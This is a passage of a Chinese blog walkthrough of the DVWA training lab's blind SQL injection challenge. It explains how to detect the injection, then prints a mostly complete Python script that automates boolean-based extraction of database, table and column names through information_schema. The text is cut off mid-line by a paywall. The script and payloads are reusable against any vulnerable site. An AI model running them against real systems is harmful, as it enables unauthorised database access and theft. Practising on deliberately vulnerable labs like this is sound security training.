DVWA通关--SQL盲注(SQL Injection(Blind))

最新推荐文章于 2025-03-31 23:59:31 发布

仙女象

最新推荐文章于 2025-03-31 23:59:31 发布

阅读量3.7k

点赞数 5

分类专栏： # 注入 dvwa 文章标签：网络安全 python mysql sql盲注 php

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/elephantxiang/article/details/113060926

版权

本文所有代码可以通过JacquelinXiang/sqli_bool: A simple tool/framework for boolean-based sql injection(GET/POST/COOKIE) (github.com)下载，README中有使用方法。

本文内容未经允许不可转载，其他原创文章也是。

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

目录

LOW

通关步骤

1、观察页面返回的信息：

输入1，按Submit之后返回User ID exists in the database.

输入6，按Submit之后返回User ID is MISSING from the database.

以上现象说明输入正确的值会返回User ID exists in the database，如果输入错误的值会返回User ID is MISSING from the database。

2、找闭合

输入1'，按Submit之后返回User ID is MISSING from the database.

输入1''，按Submit之后返回User ID exists in the database

说明闭合是单引号。

3、爆库

接下来如果用纯手工注入就太慢啦，写了个python脚本来完成爆库

#!/usr/bin/python3
# coding=utf-8

"""
functions for boolean-based sql injection(GET)

:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind"               #有可利用漏洞的url，根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request报文头部，根据实际情况填写
cookies={"security": "low", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}          #单个cookie的情况可以直接写在headers中，两个cookie的情况要用字典形式的cookies参数
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、可见特殊字符
flag = 'User ID exists in the database'                                        #用于判断附加sql语句为真的字符，根据网页回显填写

def CurrentDatabaseGET():
    n = 10                                                                      #预测当前数据库名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = "1' and length(database())>"+str(j)+"-- ss"           #所有payload根据实际情况填写
            param = {
            "id":payload1,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)     #GET方法发送含payload的request
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload2 = "1' and length(database())="+str(i)+"-- ss"
                param = {
                "id":payload2,
                "Submit":"Submit",
                }
                response = requests.get(url, params = param, headers = headers, cookies = cookies)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of current database contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload3 = "1' and substring(database(),"+str(i)+",1)='"+c+"'-- ss"
            param = {
            "id":payload3,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                db = db+c
                break
    print("the name of current database is "+str(db))
    
def TablesGET():
    n = 100                                                                     #预测当前数据库中所有表名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2
    length = 0
    tname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            param = {
            "id":payload4,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload5 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))="+str(i)+"-- ss"
                param = {
                "id":payload5,
                "Submit":"Submit",
                }
                response = requests.get(url, params = param, headers = headers, cookies = cookies)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables in current database contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload6 = "1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),"+str(i)+",1)='"+c+"'-- ss"
            param = {
            "id":payload6,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                tname = tname+c
                break
    print("the name of all tables in current database is "+str(tname))


def ColumnsGET(table):                                                          #table参数是需要爆破的数据表名称，记得加单引号
    n = 200                                                                     #预测某个表所有列名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2
    length = 0
    cname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"')))>"+str(j)+"-- ss"
            param = {
            "id":payload7,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload8 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"')))="+str(i)+"-- ss"
                param = {
                "id":payload8,
                "Submit":"Submit",
                }
                response = requests.get(url, params = param, headers = headers, cookies = cookies)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload9 = "1' and substr((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"'),"+str(i)+",1)='"+c+"'-- ss"
            param = {
            "id":payload9,
            "Submit":"Submit",
            }
            response = requests.get(url, params = param, headers &#

最低0.47元/天解锁文章

评论 2

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。